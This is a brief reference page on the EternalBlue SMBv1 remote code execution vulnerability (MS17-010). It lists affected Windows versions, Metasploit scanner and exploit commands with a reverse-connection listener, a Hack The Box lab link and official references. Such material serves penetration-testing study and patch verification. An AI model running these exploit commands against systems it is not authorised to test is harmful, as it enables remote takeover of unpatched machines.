.. / MS17-010

Exploit for Microsoft Server Message Block 1.0 (SMBv1) - Unauthenticated Remote Code Execution (EternalBlue, MS17-010, CVE-2017-0144)

Description:

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka “Windows SMB Remote Code Execution Vulnerability.

Affected Products:

Windows XP x86 (All Service Packs)
Windows 2003 x86 (All Service Packs)
Windows 7 x86 (All Service Packs)
Windows 7 x64 (All Service Packs)
Windows Server 2008 R2 x64 (All Service Packs)
Windows 8.1 x64
Windows Server 2012 R2 x64
Windows 10 Pro x64 (< Version 1507)
Windows 10 Enterprise Evaluation x64 (< Version 1507)
Windows Server 2016

Proof of Concept

PoC exploit

Metasploit Module

Check with Metasploit

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS YOUR_TARGET
set THREADS 25
run

Exploit with Metasploit

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS YOUR_TARGET
set LHOST eth0
set LPORT 1337
run

Try the exploit in a lab environment:

Lab	Machine	Link
Hack The Box	Blue	Go to Practice

References:

https://nvd.nist.gov/vuln/detail/CVE-2017-0144
https://learn.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/smb/smb_ms17_010.md
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/ms17_010_eternalblue.md
https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010

.. / MS17-010 if(localStorage["style"]=="true"){ document.getElementById('pagestyle').setAttribute('href','/assets/styleDark.css'); document.querySelector('input[type="checkbox"]').checked = true }